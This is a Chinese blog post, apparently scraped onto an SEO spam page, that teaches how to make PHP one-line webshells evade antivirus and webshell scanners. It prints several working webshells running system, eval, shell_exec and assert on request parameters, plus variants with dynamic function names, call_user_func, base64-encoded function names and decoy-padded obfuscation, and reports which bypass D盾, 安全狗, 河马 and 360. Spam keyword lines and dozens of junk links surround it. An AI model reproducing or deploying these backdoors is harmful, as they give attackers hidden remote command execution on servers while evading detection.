当前位置: 首页 > wzjs >正文

无锡做网站公司有哪些电话建设银行有没有全球门户网站

无锡做网站公司有哪些电话,建设银行有没有全球门户网站,简单的网站建设怎么做,电商网站成品案例终于也是来到了激动人心的时刻——免杀&#xff0c;这集先是简单的一句话木马的免杀 首先是经典的一句话木马&#xff1a; <?php system($_POST[xxx]); ?> <?php eval($_POST[xxx]); ?> <?php echo shell_exec($_POST[xxx]); ?> <?php assert($_…

终于也是来到了激动人心的时刻——免杀,这集先是简单的一句话木马的免杀

首先是经典的一句话木马:

<?php system($_POST['xxx']); ?>
<?php eval($_POST['xxx']); ?>
<?php echo shell_exec($_POST['xxx']); ?>
<?php assert($_POST['xxx']); ?>

然而这样朴实无华的直接上传肯定是会被杀软拦截,所以就用到了免杀的技巧

本次用来测试的环境有D盾,安全狗,河马webshell在线查杀(SHELLPUB.COM在线查杀)

首先用我自己的几个普通的一句话木马进行环境测试

发现直接就能测出来,那么接下来就是免杀的测试

传参

首先简单尝试一下多传几次参

<?php
$a=$_POST['xxx'];
$b=&$a;
$c=&$b:
eval($c);
?>

没想到这么简单就绕过了安全狗

可惜没绕过D盾

这个也是轻松查了出来,看来这样的方法注定不可能长久

当然了我们还有其他小骚招

传参绕过

可以把传入的函数名写在请求中获取,通过将函数名动态地从外部传递。

<?php$v=$_GET['func'];$v($_GET['xxx']);?>

此时可以把func传参为system,把xxx作为命令。

然后把这个方法和回调函数结合

<?php
$f=$_GET['func'];
$v=$_GET['xxx'];
call_user_func($f,$v);
?>

还可以给回调函数上一个base64加密

可惜过了D盾过不了河马

但是大佬的文章中有破局之法,那就是php中的分隔函数explode() 函数

<?php
function DD($Data) {return base64_decode($Data);
}
$a = explode("!",$_GET['s']);
DD("Y2FsbF91c2VyX2Z1bmM=")($a[0],$a[1]);
?>

这里只要传参传system!echo hack就能成功RCE

检测结果也是不必说,轻松绕过

二维数组

在免杀时我们可以考虑见要执行的一句话木马程序放到数组中执行达到绕过的目的

<?php
$a=substr_replace("assexx","rt",4);
$b=array($array=array(''=>$a($_POST['p'])));
var_dump($b);
?>

可惜的是并不行,应该是我看的文章时间有点久了,红温了喵

加密

简单的base64加密我就不尝试了,肯定过不了杀软,让我们直接来点够劲的

。。。md测试中传来噩耗,本来搞了个这个

<?phpeval($_POST["\x78\x78\170"]);

我一看这也测不到,以为成功了,结果是我的windows把我的php文件删了,牛魔的不搞这些有的没的了,直接上混淆

<?php 
function safe_waf(){$data1 = "1qazxsw23edcvfr45tgb";$data2 = "1qazXSW@3edcVFR$6yhn";$data3 = "!QAZxsw2#EDCvfr4%TGB";for ($i = 0; $i < 10; $i++) {$data1[$i % strlen($data1)];}$a = 5;$b = 10;$c = $a + $b;$a_safe = array();for ($j = 0; $j < 10; $j++) {$a_safe[] = md5($j.$data2);}return $c;
}function Safe(){$t = "1qazxsw23edcvfr45tgb";$result = strrev($t);return $result;
}function DD($Data) {return base64_decode($Data);
}
safe_waf();
echo DD("c2hlbGxfZXhlYw==")($_GET['xxx']);
Safe();
?>

PHP webshell 免杀方法_php免杀马-CSDN博客

这是粘贴这个大佬的

这里面加入了Safe和Save_waf两个无用的函数,演的更像一点

可用性就不测了,复制粘贴的包是可用的

这个马本来大佬说是绕不过安恒云沙箱的,但是我拿微步测了一下居然成功绕过了,也是很有生活了

大佬那个文章里还有用AES加密进行绕过的方法,可惜我没怎么学密码,所以就不复现了喵

那么最后来点我感兴趣的,我们的360大人能否查杀到这几个免杀马呢

360大人终究也是陨落了吗(doge)


文章转载自:

http://LnMiOTvq.tjmmc.cn
http://AXGwfbuW.tjmmc.cn
http://BGq2YvY9.tjmmc.cn
http://BpTgXgsu.tjmmc.cn
http://GjTyZ21O.tjmmc.cn
http://eff3tjOe.tjmmc.cn
http://bNtJfYBJ.tjmmc.cn
http://MnC0sOug.tjmmc.cn
http://eVegKdhF.tjmmc.cn
http://5AVcywXN.tjmmc.cn
http://5bvtQdyt.tjmmc.cn
http://axh37qSs.tjmmc.cn
http://GktjMqVb.tjmmc.cn
http://raOKBWhO.tjmmc.cn
http://zbPiW5Ku.tjmmc.cn
http://NqQOn74t.tjmmc.cn
http://gKC8vfBv.tjmmc.cn
http://twwtj0j2.tjmmc.cn
http://DVzJXUMr.tjmmc.cn
http://iraJkSwq.tjmmc.cn
http://pm1UWvVY.tjmmc.cn
http://coTyjpfv.tjmmc.cn
http://OtdlHtex.tjmmc.cn
http://g2vVzcpA.tjmmc.cn
http://Wj0H7Cbt.tjmmc.cn
http://TZrBMVpw.tjmmc.cn
http://g8In0sLe.tjmmc.cn
http://h24wZeZA.tjmmc.cn
http://5NBG14Bk.tjmmc.cn
http://gXdHWyzC.tjmmc.cn
http://www.dtcms.com/wzjs/713329.html

相关文章:

  • 网站图片设计怎样才能高大上生物公司网站建设
  • 宁波建设网站多少钱wordpress和django哪个好
  • 个人兼职网站建设微信网站搭建公司
  • 做蛋糕网站有哪些wordpress 源码 解读
  • 做网站需要准备的素材wordpress主题ux
  • 手机网站建设商场如何学做网站优化
  • 网站建设尽量wordpress 360cdn
  • 登别的网站应怎么做淄博微网站
  • 网站开发语言排行榜网站外链建设需要考核
  • 微网站建设报价表具有营销型网站有哪些
  • 邯郸兄弟建站wordpress 自定义feed
  • 电子产品网页设计模板如何优化网站推广
  • 网站建设策划模板怎么注册logo商标
  • 汉子由来 外国人做的网站软件如何开发
  • 温州网站建设推广服务网页论坛怎么实现
  • 张店网站建个人网站建设流程 域名注册的选择
  • 自助建站帮助网普通网站建设多少钱
  • 东城网站建设哪家好寿光网站建设报价
  • 精美网站开发方案建设招聘网站需要哪些资质
  • 网站开发编程入门学习福田附近网站建设
  • 建设局网站买卖合同手机建模软件
  • 网站开发运营服务合同做食物网站应该考虑些什么
  • 网站建设技术服务方案成都app开发公司排名
  • 酒店找人做网站手机网站建设做竞价推广的技巧
  • 17网站一起做网店怎么样重庆网站建设公司魁网
  • 荣泰建设集团网站网站数据库多大合适
  • 怎么做套系网站aso关键词覆盖优化
  • 滕州网站建设助企网络贺州网站seo
  • 网站建设开发网站案例项目费用手机自适应网站
  • 重庆哪家网站市场调研报告模板范文